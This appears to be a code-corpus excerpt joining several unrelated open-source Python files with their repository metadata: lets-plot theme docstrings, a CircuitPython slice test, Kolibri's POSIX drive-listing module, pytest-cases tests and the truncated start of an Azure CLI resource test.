legend_direction : {'horizontal', 'vertical'}
Layout of items in legends.
panel_background : str or dict
Background of plotting area.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify plotting area background parameters, inherited from `rect`.
panel_border : str or dict
Border around plotting area.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify border parameters, inherited from `rect`.
panel_grid, panel_grid_major, panel_grid_minor, panel_grid_major_x, panel_grid_major_y, panel_grid_minor_x, panel_grid_minor_y : str or dict
Grid lines. Specify major grid lines or minor grid lines separately if needed.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_line()` to specify grid line parameters.
`panel_grid_*_*` inherits from `panel_grid_*` which inherits from `panel_grid`,
which in turn inherits from `line`.
plot_background : str or dict
Background of the entire plot.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify plot background parameters, inherited from `rect`.
plot_title : str or dict
Plot title.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify plot title parameters, inherited from `title`.
plot_subtitle : str or dict
Plot subtitle.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify plot subtitle parameters, inherited from `plot_title` or `title`.
plot_caption : str or dict
Plot caption.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify plot caption parameters, inherited from `title`.
strip_background : str or dict
Background of facet labels.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify facet label background parameters, inherited from `rect`.
strip_text : str or dict
Facet labels.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify facet label parameters, inherited from `text`.
axis_tooltip, axis_tooltip_x, axis_tooltip_y : str or dict
Axes tooltips.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_rect()` to specify axes tooltip parameters.
`axis_tooltip_*` inherits from `axis_tooltip` which inherits from `rect`.
axis_tooltip_text, axis_tooltip_text_x, axis_tooltip_text_y : str or dict
Text in axes tooltips.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify axes text tooltip parameters.
`axis_tooltip_text_*` inherits from `axis_tooltip_text` which inherits from `tooltip_text`.
tooltip : str or dict
General tooltip.
Set `element_rect()` to specify tooltip rectangular parameters, inherited from `rect`.
tooltip_text : str or dict
Text in general tooltip.
Set `element_text()` to specify tooltip text parameters.
tooltip_title_text: str or dict
Tooltip title text.
Set `element_text()` to specify tooltip title parameters, inherited from `tooltip_text`. Bold by default.
geom: dict
Geometry colors.
Set `element_geom()` to specify new values for the named colors.
Returns
-------
`FeatureSpec`
Theme specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 11-16
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
n = 100
np.random.seed(42)
x = np.random.normal(size=n)
c = np.random.choice(['a', 'b', 'c'], size=n)
ggplot({'x': x, 'class': c}, aes('x')) + \\
geom_density(aes(color='class'), size=2) + \\
ggtitle('Density of classes') + \\
theme(axis_line=element_line(size=4), \\
axis_ticks_length=10, \\
axis_title_y='blank', \\
legend_position=[1, 1], legend_justification=[1, 1], \\
panel_background=element_rect(color='black', fill='#eeeeee', size=2), \\
panel_grid=element_line(color='black', size=1))
|
.. jupyter-execute::
:linenos:
:emphasize-lines: 14-19
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
n = 1000
np.random.seed(42)
p = np.random.uniform(size=7)
x = np.random.choice(range(p.size), p=p/p.sum(), size=n)
c = np.random.choice(['a', 'b', 'c'], p=[.5, .3, .2], size=n)
ggplot({'x': x, 'class': c}) + \\
geom_bar(aes('x', fill='x')) + \\
scale_y_continuous(breaks=list(range(0, 151, 25))) + \\
scale_fill_discrete() + \\
facet_grid(y='class') + \\
theme(axis_line_x='blank', \\
axis_ticks=element_line(color='white'), \\
panel_grid_major_x='blank', \\
strip_background=element_rect(color='black', fill='white'), \\
axis_tooltip=element_rect(color='black', fill='white'), \\
legend_position='top')
"""
filtered = _filter_none(locals())
return FeatureSpec('theme', name=None, **filtered)
def _filter_none(original: dict) -> dict:
def _filter_val(value):
if isinstance(value, dict):
return _filter_none(value)
else:
return value
return {k: _filter_val(v) for k, v in original.items() if v is not None}
def element_blank() -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(axis_title_x=element_blank(), axis_ticks=element_blank())
"""
return dict(blank=True)
def element_rect(
fill=None,
color=None,
size=None,
# ToDo: linetype
blank=False,
) -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws borders and backgrounds.
Parameters
----------
fill : str
Fill color.
color : str
Border color.
size : int
Border size.
blank : bool, default=False
If True - draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(panel_background=element_rect())
"""
return locals()
def element_line(
color=None,
size=None,
# ToDo: linetype, lineend, arrow
blank=False,
) -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws lines.
Parameters
----------
color : str
Line color.
size : int
Line size.
blank : bool, default=False
If True - draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(panel_grid=element_line(size=3))
"""
return locals()
def element_text(
color=None,
family=None,
face=None,
size=None,
angle=None,
# ToDo: lineheight
hjust=None,
vjust=None,
margin=None,
blank=False,
) -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws texts.
Parameters
----------
color : str
Text color.
family : str
Font family.
face : str
Font face ("plain", "italic", "bold", "bold_italic").
size : int
Text size in pt.
angle : float
Angle to rotate the text (in degrees).
hjust : float
Horizontal justification (in [0, 1]).
0 - left-justified
1 - right-justified
0.5 - center-justified
Can be used with values out of range, but behaviour is not specified.
vjust : float
Vertical justification (in [0, 1]).
0 - bottom-justified
1 - top-justified
0.5 - middle-justified
Can be used with values out of range, but behaviour is not specified.
margin : `margin`
Margins around the text. See `margin()` for more details.
blank : bool, default=False
If True - draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(axis_text=element_text(color='#bdbdbd'))
"""
return locals()
def margin(t=None, r=None, b=None, l=None) -> dict:
"""
Dimensions of each margin.
Parameters
----------
t : float
Top margin.
r : float
Right margin.
b : float
Bottom margin.
l : float
Left margin.
Returns
-------
`dict`
Margins specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(axis_title=element_text(margin=margin(t=10,r=10,b=4,l=4)))
"""
return locals()
def element_geom(
pen=None,
brush=None,
paper=None,
# ToDo: fatten
) -> dict:
"""
Specify new values for the named colors.
Parameters
----------
pen : str
Color to use by name "pen".
brush : str
Color to use by name "brush".
paper : str
Color to use by name "paper".
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram(color='pen', fill='paper') + \\
theme(geom=element_geom(pen='dark_blue', paper='light_blue'))
"""
return locals()
|
e5b24979f06312d08f923b6bb31f8c621fc4bae5
|
83b8b30ebb633eecd29ca0a7a20cc43a293c9333
|
/tests/basics/list_slice_assign.py
|
885615717232ada1e94b725db2a0629a589dd51f
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
adafruit/circuitpython
|
430ec895149d1eb814b505db39b4977a35ee88a7
|
506dca71b0cbb7af749bb51f86b01021db5483b3
|
refs/heads/main
| 2023-08-21T16:30:46.781068
| 2023-08-20T00:39:44
| 2023-08-20T00:39:44
| 66,166,069
| 3,806
| 1,560
|
MIT
| 2023-09-14T19:23:51
| 2016-08-20T20:10:40
|
C
|
UTF-8
|
Python
| false
| false
| 621
|
py
|
list_slice_assign.py
|
# test slices; only 2 argument version supported by MicroPython at the moment
x = list(range(10))
# Assignment
l = list(x)
l[1:3] = [10, 20]
print(l)
l = list(x)
l[1:3] = [10]
print(l)
l = list(x)
l[1:3] = []
print(l)
l = list(x)
del l[1:3]
print(l)
l = list(x)
l[:3] = [10, 20]
print(l)
l = list(x)
l[:3] = []
print(l)
l = list(x)
del l[:3]
print(l)
l = list(x)
l[:-3] = [10, 20]
print(l)
l = list(x)
l[:-3] = []
print(l)
l = list(x)
del l[:-3]
print(l)
# assign a tuple
l = [1, 2, 3]
l[0:1] = (10, 11, 12)
print(l)
# RHS of slice must be an iterable
try:
[][0:1] = 123
except TypeError:
print('TypeError')
|
2bb37a82962a57a0e65c4e35a4c80d8264a9f5d6
|
df87814cb32990ad8c27d0b13a821aabce012819
|
/kolibri/core/discovery/utils/filesystem/posix.py
|
64d1b91e2d766a237aaaacf1ebae0322ace7addf
|
[
"MIT"
] |
permissive
|
learningequality/kolibri
|
26812d4ae771f3b389d3317a586bc032fc84866b
|
cc9da2a6acd139acac3cd71c4cb05c15d4465712
|
refs/heads/release-v0.16.x
| 2023-09-01T18:07:29.720772
| 2023-08-31T15:43:47
| 2023-08-31T15:43:47
| 49,976,939
| 689
| 682
|
MIT
| 2023-09-14T20:02:29
| 2016-01-19T19:22:07
|
Python
|
UTF-8
|
Python
| false
| false
| 9,838
|
py
|
posix.py
|
import logging
import os
import re
import shutil
import subprocess
import sys
from .constants import drivetypes
from kolibri.utils.android import on_android
logger = logging.getLogger(__name__)
# Regex parser for the output of `mount` on OSX, which contains rows that looks like:
# /dev/disk1s1 on /Volumes/HP v125w (msdos, local, nodev, nosuid, noowners)
OSX_MOUNT_PARSER = re.compile(
r"^(?P<device>\S+) on (?P<path>.+) \((?P<filesystem>[^, ]+)", flags=re.MULTILINE
)
# Regex parser for the output of `mount` on Linux, which contains rows that looks like:
# /dev/sdb2 on /media/user/KEEPOD type ext4 (rw,nosuid,nodev,uhelper=udisks2)
LINUX_MOUNT_PARSER = re.compile(
r"^(?P<device>\S+) on (?P<path>.+) type (?P<filesystem>\S+)", flags=re.MULTILINE
)
# Regex parser for the output of 'mount' on Android, which contains rows that looks like:
# /dev/block/bootdevice/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,noauto_da_alloc,data=ordered 0 0
# Note that access to /proc/ is restricted in later versions of Android. Will break the app.
RAW_MOUNT_PARSER = re.compile(
r"^(?P<device>\S+) (?P<path>\S+) (?P<filesystem>\S+)", flags=re.MULTILINE
)
FILESYSTEM_BLACKLIST = set(
[
"anon_inodefs",
"bdev",
"binfmt_misc",
"cgroup",
"cpuset",
"debugfs",
"devpts",
"devtmpfs",
"ecryptfs",
"fuse",
"fuse.gvfsd-fuse",
"fuse.portal",
"fusectl",
"hugetlbfs",
"mqueue",
"nfs",
"nfs4",
"nfsd",
"pipefs",
"proc",
"pstore",
"ramfs",
"rootfs",
"rpc_pipefs",
"securityfs",
"sockfs",
"sysfs",
"tmpfs",
"cgmfs",
]
)
# These paths can be mounted as separate drives/partitions,
# so they should not be shown in the list of import/export drives.
PATH_PREFIX_BLACKLIST = ["/proc", "/sys", "/tmp", "/var", "/boot", "/dev"]
def get_drive_list():
"""
Gets a list of drives and metadata by parsing the output of `mount`, and adding additional info from various commands.
Disk size/usage comes from shutil.disk_usage or os.statvfs, and name/type info from dbus (Linux) or diskutil (OSX).
"""
if sys.platform == "darwin":
MOUNT_PARSER = OSX_MOUNT_PARSER
else:
MOUNT_PARSER = LINUX_MOUNT_PARSER
try:
drivelist = subprocess.Popen("mount", shell=True, stdout=subprocess.PIPE)
drivelisto, err = drivelist.communicate()
# Some Android devices at least now use the LINUX_MOUNT_PARSER format.
# Try it and revert to RAW_MOUNT_PARSER if we can't find any matches with it.
if on_android() and not MOUNT_PARSER.match(drivelisto.decode()):
MOUNT_PARSER = RAW_MOUNT_PARSER
except OSError: # couldn't run `mount`, let's try reading the /etc/mounts listing directly
with open("/proc/mounts") as f:
drivelisto = f.read()
MOUNT_PARSER = RAW_MOUNT_PARSER
drives = []
for drivematch in MOUNT_PARSER.finditer(drivelisto.decode()):
drive = drivematch.groupdict()
path = (
drive["path"]
.replace("\\040", " ")
.replace("\\011", "\t")
.replace("\\012", "\n")
.replace("\\134", "\\")
)
# skip the drive if the filesystem or path is in a blacklist
if drive["filesystem"] in FILESYSTEM_BLACKLIST or any(
path.startswith(p) for p in PATH_PREFIX_BLACKLIST
):
logger.debug("Skipping blacklisted drive '{}'".format(path))
continue
# skip if we don't have read access to the drive
if not os.access(path, os.R_OK):
continue
# attempt to get some additional metadata about the drive
try:
usage = _get_drive_usage(path)
except OSError:
# skip if we don't have access to get drive usage
continue
dbus_drive_info = _try_to_get_drive_info_from_dbus(drive["device"])
diskutil_info = _try_to_get_drive_info_from_diskutil(drive["device"])
# combine the various metadata sources to construct the overall drive metadata
drives.append(
{
"path": path,
"name": dbus_drive_info.get("name")
or diskutil_info.get("name")
or path,
"filesystem": drive["filesystem"],
"freespace": usage["free"],
"totalspace": usage["total"],
"drivetype": dbus_drive_info.get("drivetype")
or diskutil_info.get("drivetype")
or "",
"guid": dbus_drive_info.get("guid")
or diskutil_info.get("guid")
or drive["device"],
}
)
return drives
def _get_drive_usage(path):
"""
Use Python libraries to get drive space/usage statistics. Prior to v3.3, use `os.statvfs`;
on v3.3+, use the more accurate `shutil.disk_usage`.
"""
if sys.version_info >= (3, 3):
usage = shutil.disk_usage(path)
return {"total": usage.total, "used": usage.used, "free": usage.free}
if on_android():
from jnius import autoclass
StatFs = autoclass("android.os.StatFs")
AndroidString = autoclass("java.lang.String")
stats = StatFs(AndroidString(path))
return {
"total": stats.getBlockCountLong() * stats.getBlockSizeLong(),
"free": stats.getAvailableBlocksLong() * stats.getBlockSizeLong(),
}
# with os.statvfs, we need to multiple block sizes by block counts to get bytes
stats = os.statvfs(path)
total = stats.f_frsize * stats.f_blocks
free = stats.f_frsize * stats.f_bavail
return {"total": total, "free": free, "used": total - free}
def _try_to_get_drive_info_from_dbus(device):
"""
One of the only ways to access a lot of useful information about drives, without requiring root/sudo,
is through DBUS. The Python library for DBUS is not always installed, but use it if available.
"""
# ensure the device is under /dev, and extract the block device name
path_components = os.path.split(device)
if path_components[0] != "/dev":
return {}
block_device_name = path_components[-1]
# try importing dbus, and exit gracefully if it fails
try:
import dbus
except ImportError:
return {}
try:
bus = dbus.SystemBus()
# get the block object based on the block device name
block_obj = bus.get_object(
"org.freedesktop.UDisks2",
"/org/freedesktop/UDisks2/block_devices/" + block_device_name,
)
block_iface = dbus.Interface(block_obj, "org.freedesktop.DBus.Properties")
block = block_iface.GetAll("org.freedesktop.UDisks2.Block")
# get the drive object, based on the drive identifier from the block object
drive_path = block.get("Drive")
drive_obj = bus.get_object("org.freedesktop.UDisks2", drive_path)
drive_iface = dbus.Interface(drive_obj, "org.freedesktop.DBus.Properties")
drive = drive_iface.GetAll("org.freedesktop.UDisks2.Drive")
# extract the name and guid from the block and drive properties, calculate drivetype, and return
return {
"name": str(
block.get("IdLabel")
or " ".join([drive.get("Vendor"), drive.get("Model")]).strip()
),
"guid": str(block.get("IdUUID") or drive.get("Serial") or drive.get("Id")),
"drivetype": _get_drivetype_from_dbus_drive_properties(drive),
}
except ValueError:
return {}
except dbus.exceptions.DBusException:
return {}
def _get_drivetype_from_dbus_drive_properties(drive_props):
"""
Read the block and drive properties from dbus drive props object to determine our best guess at the drive type.
"""
if (
drive_props.get("ConnectionBus") == "sdio"
or drive_props.get("Media") == "flash_sd"
):
return drivetypes.SD_CARD
if drive_props.get("ConnectionBus") == "usb" or drive_props.get("Media") == "thumb":
return drivetypes.USB_DEVICE
if drive_props.get("Optical"):
return drivetypes.OPTICAL_DRIVE
if drive_props.get("Removable") or drive_props.get("MediaRemovable"):
return drivetypes.USB_DEVICE
return drivetypes.UNKNOWN
def _try_to_get_drive_info_from_diskutil(device):
"""
On OSX, the best way to get disk info is with `diskutil`.
"""
# we only use diskutil on OSX
if sys.platform != "darwin":
return {}
# skip non-device mounts
if not device.startswith("/dev/"):
return {}
# run the command and read the results
diskutilp = subprocess.Popen(
"diskutil info {}".format(device), shell=True, stdout=subprocess.PIPE
)
diskutil_output, err = diskutilp.communicate()
rows = [
line.split(":", 1)
for line in diskutil_output.decode().split("\n")
if ":" in line
]
metadata = dict([(key.strip(), val.strip()) for key, val in rows])
# determine what type of drive it is (not sure what an optical drive shows up as, but OSX + optical is now uncommon)
if metadata.get("Protocol") == "USB":
drivetype = drivetypes.USB_DEVICE
elif metadata.get("Internal") == "Yes":
drivetype = drivetypes.INTERNAL_DRIVE
else:
drivetype = drivetypes.UNKNOWN
# extract the name and guid from the diskutil drive metadata, and return
return {
"drivetype": drivetype,
"name": metadata.get("Volume Name")
or metadata.get("Device / Media Name")
or "",
"guid": metadata.get("Volume UUID") or "",
}
|
c0ec6c105921ec8300c801a92310da726c3aba73
|
c29eba01ce299ebb27b886a83e19e59add7e2f6b
|
/tests/cases/doc/test_get_current_cases.py
|
2a1e3aaa03d1fddb607fe32a4ff3c9f7aeee901a
|
[
"BSD-3-Clause"
] |
permissive
|
smarie/python-pytest-cases
|
e87516e73d5067d5c307c7fdb37cc5f1f97c417e
|
ab3b7190d728b18512141b9f5f3a1c3dfc7cedf2
|
refs/heads/main
| 2023-07-08T11:41:57.278697
| 2023-02-23T13:11:25
| 2023-02-23T13:11:25
| 138,296,136
| 286
| 40
|
BSD-3-Clause
| 2023-07-03T14:57:02
| 2018-06-22T11:42:19
|
Python
|
UTF-8
|
Python
| false
| false
| 9,058
|
py
|
test_get_current_cases.py
|
# Authors: Sylvain MARIE <sylvain.marie@se.com>
# + All contributors to <https://github.com/smarie/python-pytest-cases>
#
# License: 3-clause BSD, <https://github.com/smarie/python-pytest-cases/blob/master/LICENSE>
from pytest_cases import parametrize_with_cases, fixture, case, filters, get_current_cases
from . import test_get_current_cases_cases as casesfile
from pytest_cases.common_pytest_marks import PYTEST3_OR_GREATER
@case(tags=("no_fix_needed",))
def case_a():
return 1, 2
@case(tags=("no_fix_needed",))
def case_b():
return 1, 2
@case(id="custom_id", tags=("no_fix_needed",))
def tuplecase_a():
return 1, 2
@case(id="custom_id")
def case_a_fixture(request):
return 1, 2
def tuplecase_a_fixture(request):
return 1, 2
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", cases=".", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", cases=".", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", cases=".", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", cases=".", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_local_cases(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2,
current_cases, request):
# also try with a late call, just to be sure that a cache would not prevent us to access the lazy value getters
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct, local=True)
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_separate_cases_file(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2,
current_cases, request):
# also try with a late call, just to be sure that a cache would not prevent us to access the lazy value getters
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct, local=False)
def _assert_cases(current_cases, local=True):
ref_dict = {
'a': case_a if local else casesfile.case_a,
'b': case_b if local else casesfile.case_b
}
assert len(current_cases["purelazy_a"]) == 3
assert current_cases["purelazy_a"][1] is ref_dict[current_cases["purelazy_a"][0]]
assert current_cases["purelazy_a"][2] == {}
assert len(current_cases["purelazy_t1"]) == 3
assert current_cases["purelazy_t1"][0] == "custom_id"
assert current_cases["purelazy_t1"][1] is (tuplecase_a if local else casesfile.tuplecase_a)
assert current_cases["purelazy_t1"][2] == {}
assert current_cases["purelazy_t1"] == current_cases["purelazy_t2"]
ref_dict = {
'a': case_a if local else casesfile.case_a,
'b': case_b if local else casesfile.case_b,
'custom_id': case_a_fixture if local else casesfile.case_a_fixture
}
assert len(current_cases["withfixrefs_f"]) == 3
assert current_cases["withfixrefs_f"][1] is ref_dict[current_cases["withfixrefs_f"][0]]
assert current_cases["withfixrefs_f"][2] == {}
ref_dict = {
'custom_id': tuplecase_a if local else casesfile.tuplecase_a,
"a_fixture": tuplecase_a_fixture if local else casesfile.tuplecase_a_fixture
}
assert len(current_cases["withfixrefs_f1"]) == 3
assert current_cases["withfixrefs_f1"][1] is ref_dict[current_cases["withfixrefs_f1"][0]]
assert current_cases["withfixrefs_f2"] == current_cases["withfixrefs_f1"]
if PYTEST3_OR_GREATER:
@fixture
@parametrize_with_cases("purelazy_t1,purelazy_t2", cases=".", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", cases=".", prefix="tuplecase_")
@parametrize_with_cases("purelazy_a", cases=".", prefix="case_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("withfixrefs_f", cases=".", prefix="case_")
def my_fixture_local(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_local"
}
_assert_cases(cases_dct, local=True)
assert set(cases_dct["my_fixture_local"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_local"], local=True)
@fixture
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def my_fixture_separate_file(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_separate_file"
}
_assert_cases(cases_dct, local=False)
assert set(cases_dct["my_fixture_separate_file"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_separate_file"], local=False)
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", cases=".", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", cases=".", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", cases=".", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", cases=".", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_local_cases_with_fix(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, my_fixture_local, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_local"
}
_assert_cases(cases_dct, local=True)
assert set(cases_dct["my_fixture_local"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_local"], local=True)
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_separate_cases_file_with_fix(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, my_fixture_separate_file, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_separate_file"
}
_assert_cases(cases_dct, local=False)
assert set(cases_dct["my_fixture_separate_file"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_separate_file"], local=False)
|
6e82c5ec1811060133dfc18258a74c22ae880a1c
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_api_check.py
|
6a74af36cf2d913f5a2a99434879bd565ddc625e
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 5,190
|
py
|
test_api_check.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
from unittest.mock import MagicMock
from knack.util import CLIError
from azure.cli.command_modules.resource.custom import (_ResourceUtils, _validate_resource_inputs,
parse_resource_id)
class TestApiCheck(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
def test_parse_resource(self):
parts = parse_resource_id('/subscriptions/00000/resourcegroups/bocconitestlabrg138089/'
'providers/microsoft.devtestlab/labs/bocconitestlab/'
'virtualmachines/tasktest1')
self.assertIsNotNone(parts.get('type'))
def test_parse_resource_capital(self):
parts = parse_resource_id('/subscriptions/00000/resourceGroups/bocconitestlabrg138089/'
'providers/microsoft.devtestlab/labs/bocconitestlab/'
'virtualmachines/tasktest1')
self.assertIsNotNone(parts.get('type'))
def test_validate_resource_inputs(self):
self.assertRaises(CLIError, _validate_resource_inputs, None, None, None, None)
self.assertRaises(CLIError, _validate_resource_inputs, 'a', None, None, None)
self.assertRaises(CLIError, _validate_resource_inputs, 'a', 'b', None, None)
self.assertRaises(CLIError, _validate_resource_inputs, 'a', 'b', 'c', None)
_validate_resource_inputs('a', 'b', 'c', 'd')
def test_resolve_api_provider_backup(self):
# Verifies provider is used as backup if api-version not specified.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, resource_type='Mock/test', resource_name='vnet1',
resource_group_name='rg', rcf=rcf)
self.assertEqual(res_utils.api_version, "2016-01-01")
def test_resolve_api_provider_with_parent_backup(self):
# Verifies provider (with parent) is used as backup if api-version not specified.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, parent_resource_path='foo/testfoo123', resource_group_name='rg',
resource_provider_namespace='Mock', resource_type='test',
resource_name='vnet1',
rcf=rcf)
self.assertEqual(res_utils.api_version, "1999-01-01")
def test_resolve_api_all_previews(self):
# Verifies most recent preview version returned only if there are no non-preview versions.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, resource_type='Mock/preview', resource_name='vnet1',
